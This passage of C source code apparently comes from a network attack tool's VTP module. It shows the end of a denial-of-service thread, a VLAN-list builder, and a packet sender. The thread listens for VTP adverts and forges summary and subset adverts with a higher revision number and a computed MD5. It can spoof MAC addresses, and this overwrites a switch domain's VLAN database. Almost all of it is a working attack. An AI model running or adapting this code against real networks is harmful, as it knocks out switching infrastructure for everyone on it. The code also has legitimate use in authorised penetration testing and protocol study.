vtp_th_dos_crash_exit(attacks); } attacks = arg; vtp_data = attacks->data; gettimeofday(&now, NULL); header.ts.tv_sec = now.tv_sec; header.ts.tv_usec = now.tv_usec; if ((packet = calloc(1, SNAPLEN)) == NULL) vtp_th_dos_crash_exit(attacks); while (!attacks->attack_th.stop) { memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data)); interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet, PROTO_VTP, NO_TIMEOUT); if (attacks->attack_th.stop) break; cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H); ether = (struct libnet_802_3_hdr *) packet; if (!memcmp(vtp_data->mac_source,ether->_802_3_shost,6) ) continue; /* Oops!! Its our packet... */ pcap_aux.header = &header; pcap_aux.packet = packet; if (vtp_load_values(&pcap_aux, &vtp_data_learned) < 0) continue; if ((vtp_data_learned.code != VTP_SUMM_ADVERT) && (vtp_data_learned.code != VTP_SUBSET_ADVERT) ) continue; if (vtp_generate_md5( NULL, vtp_data->updater, (vtp_data_learned.revision+1), vtp_data_learned.domain, vtp_data_learned.dom_len, vlan_cisco, sizeof(vlan_cisco), vtp_data->md5, vtp_data_learned.version) < 0) break; vtp_data->code = VTP_SUMM_ADVERT; vtp_data->followers = 1; if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE) { vtp_data->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_data->domain,vtp_data_learned.domain,VTP_DOMAIN_SIZE); } else { vtp_data->dom_len = vtp_data_learned.dom_len; memcpy(vtp_data->domain,vtp_data_learned.domain,vtp_data_learned.dom_len); } vtp_data->revision = vtp_data_learned.revision+1; usleep(200000); if (vtp_send(attacks)< 0) break; usleep(200000); vtp_data->code = VTP_SUBSET_ADVERT; vtp_data->seq = 1; vtp_data->vlan_info = vlan_cisco; vtp_data->vlans_len = sizeof(vlan_cisco); vtp_send(attacks); break; } free(packet); vtp_th_dos_crash_exit(attacks); }
int8_t vtp_add_vlan(u_int16_t vlan, char *vlan_name, u_int8_t **vlans_ptr, u_int16_t *vlen) { struct vlan_info *vlan_info, *vlan_info2; u_int8_t *cursor, *cursor2, *aux, *vlans, *last_init=NULL; u_int16_t len=0, vlans_len, last_id=0, last_len=0; vlans = *vlans_ptr; vlans_len = *vlen; aux = (u_int8_t *)calloc(1,vlans_len+sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name))); if (aux == NULL) { thread_error("vtp_add_vlan calloc()", errno); return -1; } cursor = vlans; while( (cursor+sizeof(struct vlan_info)) < (vlans+vlans_len)) { vlan_info = (struct vlan_info *) cursor; if ((cursor+vlan_info->len) > (vlans+vlans_len)) break; if ( (ntohs(last_id)<= vlan) && (ntohs(vlan_info->id)>= vlan) ) { if (last_init == NULL) /* First VLAN */ { vlan_info = (struct vlan_info *) aux; vlan_info->len = sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name)); vlan_info->status = 0x00; vlan_info->type = VLAN_TYPE_ETHERNET; vlan_info->name_len = strlen(vlan_name); vlan_info->id = htons(vlan); vlan_info->mtu = htons(1500); vlan_info->dot10 = htonl(vlan+VTP_DOT10_BASE); memcpy((void *)(vlan_info+1),vlan_name,strlen(vlan_name)); /* Now copy all the rest of vlans...*/ memcpy((void *)(aux+vlan_info->len),vlans,vlans_len); *vlen = vlan_info->len+vlans_len; *vlans_ptr = aux; return 0; } cursor+=vlan_info->len; len = vlans_len-vlan_info->len; if ( (cursor+sizeof(struct vlan_info)) < (vlans+vlans_len)) { cursor2 = (u_int8_t *)vlan_info; vlan_info2 = (struct vlan_info *) cursor2; if ((cursor2+vlan_info2->len) > (vlans+vlans_len)) { /* Oversized!! */ write_log(0," Oversized vlan length. Aborting...\n"); free(aux); return -1; } memcpy(aux,(void *)*vlans_ptr,( (last_init+last_len) - vlans )); vlan_info = (struct vlan_info *) (aux+ ((last_init+last_len) - vlans)); vlan_info->len = sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name)); vlan_info->status = 0x00; vlan_info->type = VLAN_TYPE_ETHERNET; vlan_info->name_len = strlen(vlan_name); vlan_info->id = htons(vlan); vlan_info->mtu = htons(1500); vlan_info->dot10 = htonl(vlan+VTP_DOT10_BASE); memcpy((void *)(vlan_info+1),vlan_name,strlen(vlan_name)); cursor=(u_int8_t *)vlan_info; cursor+=vlan_info->len; memcpy(cursor, cursor2, (vlans+vlans_len)-cursor2 ); *vlen = vlan_info->len+vlans_len; *vlans_ptr = aux; return 0; } else /* Last VLAN... */ { return 0; } break; } /* We got it */ last_len = vlan_info->len; last_id = vlan_info->id; last_init = (u_int8_t *)vlan_info; cursor+=vlan_info->len; } /* Last VLAN...*/ memcpy((void *)aux,(void *)*vlans_ptr,vlans_len); vlan_info = (struct vlan_info *)(aux+vlans_len); vlan_info->len = sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name)); vlan_info->status = 0x00; vlan_info->type = VLAN_TYPE_ETHERNET; vlan_info->name_len = strlen(vlan_name); vlan_info->id = htons(vlan); vlan_info->mtu = htons(1500); vlan_info->dot10 = htonl(vlan+VTP_DOT10_BASE); memcpy((void *)(vlan_info+1),vlan_name,strlen(vlan_name)); *vlen = vlan_info->len+vlans_len; *vlans_ptr = aux; return 0; }
int8_t vtp_send(struct attacks *attacks) { libnet_ptag_t t; libnet_t *lhandler; u_int32_t vtp_len=0, sent; struct vtp_data *vtp_data; struct vtp_summary *vtp_summ; struct vtp_subset *vtp_subset; struct vtp_request *vtp_request; struct vtp_join *vtp_join; u_int8_t *vtp_packet, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; dlist_t *p; struct interface_data *iface_data; struct interface_data *iface_data2; vtp_data = attacks->data; switch(vtp_data->code) { case VTP_SUMM_ADVERT: vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); break; case VTP_SUBSET_ADVERT: vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset)+vtp_data->vlans_len; break; case VTP_REQUEST: vtp_len = sizeof(cisco_data)+38; break; case VTP_JOIN: vtp_len = sizeof(cisco_data)+40+126; break; default: vtp_len = sizeof(cisco_data)+30; break; } vtp_packet = calloc(1,vtp_len); if (vtp_packet == NULL) { thread_error("vtp_send calloc error",errno); return -1; } aux = vtp_packet; memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); switch(vtp_data->code) { case VTP_SUMM_ADVERT: vtp_summ = (struct vtp_summary *)aux; vtp_summ->version = vtp_data->version; vtp_summ->code = vtp_data->code; vtp_summ->followers = vtp_data->followers; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_summ->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_summ->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_summ->dom_len = vtp_data->dom_len; memcpy(vtp_summ->domain,vtp_data->domain,vtp_data->dom_len); } vtp_summ->revision = htonl(vtp_data->revision); vtp_summ->updater = htonl(vtp_data->updater); memcpy(vtp_summ->timestamp,vtp_data->timestamp,VTP_TIMESTAMP_SIZE); memcpy(vtp_summ->md5,vtp_data->md5,16); break; case VTP_SUBSET_ADVERT: vtp_subset = (struct vtp_subset *)aux; vtp_subset->version = vtp_data->version; vtp_subset->code = vtp_data->code; vtp_subset->seq = vtp_data->seq; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_subset->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_subset->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_subset->dom_len = vtp_data->dom_len; memcpy(vtp_subset->domain,vtp_data->domain,vtp_data->dom_len); } vtp_subset->revision = htonl(vtp_data->revision); if (vtp_data->vlans_len) memcpy((vtp_subset+1),vtp_data->vlan_info,vtp_data->vlans_len); break; case VTP_REQUEST: vtp_request = (struct vtp_request *)aux; vtp_request->version = vtp_data->version; vtp_request->code = vtp_data->code; vtp_request->reserved = 0; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_request->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_request->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_request->dom_len = vtp_data->dom_len; memcpy(vtp_request->domain,vtp_data->domain,vtp_data->dom_len); } vtp_request->start_val = htons(vtp_data->start_val); break; case VTP_JOIN: vtp_join = (struct vtp_join *)aux; vtp_join->version = vtp_data->version; vtp_join->code = vtp_data->code; vtp_join->maybe_reserved = 0; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_join->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_join->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_join->dom_len = vtp_data->dom_len; memcpy(vtp_join->domain,vtp_data->domain,vtp_data->dom_len); } vtp_join->vlan = htonl(0x000003ef); vtp_join->unknown[0] = 0x40; break; default: aux[0]=vtp_data->version; aux[1]=vtp_data->code; break; } for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) { iface_data = (struct interface_data *) dlist_data(p); lhandler = iface_data->libnet_handler; t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(vtp_packet); return -1; } t = libnet_build_802_3( vtp_data->mac_dest, /* ethernet destination */ (attacks->mac_spoofing) ? vtp_data->mac_source : iface_data->etheraddr, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(vtp_packet); return -1; } /* * Write it to the wire. */ sent = libnet_write(lhandler); if (sent == -1) { thread_libnet_error("libnet_write error", lhandler); libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); protocols[PROTO_VTP].packets_out++; iface_data2 = interfaces_get_struct(iface_data->ifname); iface_data2->packets_out[PROTO_VTP]++; } free(vtp_packet); return 0; }